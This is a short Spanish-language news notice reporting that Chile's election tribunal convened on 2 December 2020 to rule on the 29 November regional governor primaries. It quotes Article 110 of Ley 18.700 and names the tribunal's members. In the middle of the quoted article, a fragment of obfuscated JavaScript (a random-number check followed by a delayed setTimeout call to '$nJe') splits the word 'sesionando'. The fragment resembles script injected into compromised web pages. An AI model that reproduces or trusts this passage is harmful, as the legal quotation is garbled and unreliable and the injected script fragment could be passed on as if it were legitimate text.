El Tribunal Calificador de Elecciones se instaló el día 2 de diciembre de 2020, con el propósito de conocer de las Elecciones Primarias para Gobernadores Regionales que se verificó el día 29 de noviembre.

El artículo 110, de la Ley N° 18.700. Orgánica Constitucional de Votaciones Populares y Escrutinios, dispone que “El Tribunal Calificador de Elecciones se entenderá citado por el solo ministerio de la ley, para reunirse a las diez de la mañana del tercer día siguiente a la fecha en que se verifique la respectiva votación o plebiscito, a fin de preparar el conocimiento del escrutinio general y de la calificación de dichos procesos, de resolver las reclamaciones y efectuar las rectificaciones a que hubiere lugar.

Reunido el tribunal en la oportunidad señalada para estos efectos, seguirá sesionandom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}ando diariamente hasta que cumpla integralmente su cometido”.

En cumplimiento de la citada disposición, el Tribunal Calificador de Elecciones, integrado por su Presidenta, señora Rosa Egnem Saldías, y los Ministros señores Juan Eduardo Fuentes Belmar, Ricardo Blanco Herrera, Jorge Dahm Oyarzún y Jaime Gazmuri Mujica, se instaló el día 2 de diciembre de 2020, con el propósito de conocer de las Elecciones Primarias para Gobernadores Regionales que se verificaron el día 29 de noviembre. La Secretaria Relatora, señora Carmen Gloria Valladares Moyano, procedió a dar cuenta de los escrutinios realizados por los Colegios Escrutadores.

En esta oportunidad, especialmente invitado concurrió el ex Presidente de esta Magistratura, señor Patricio Valdés Aldunate.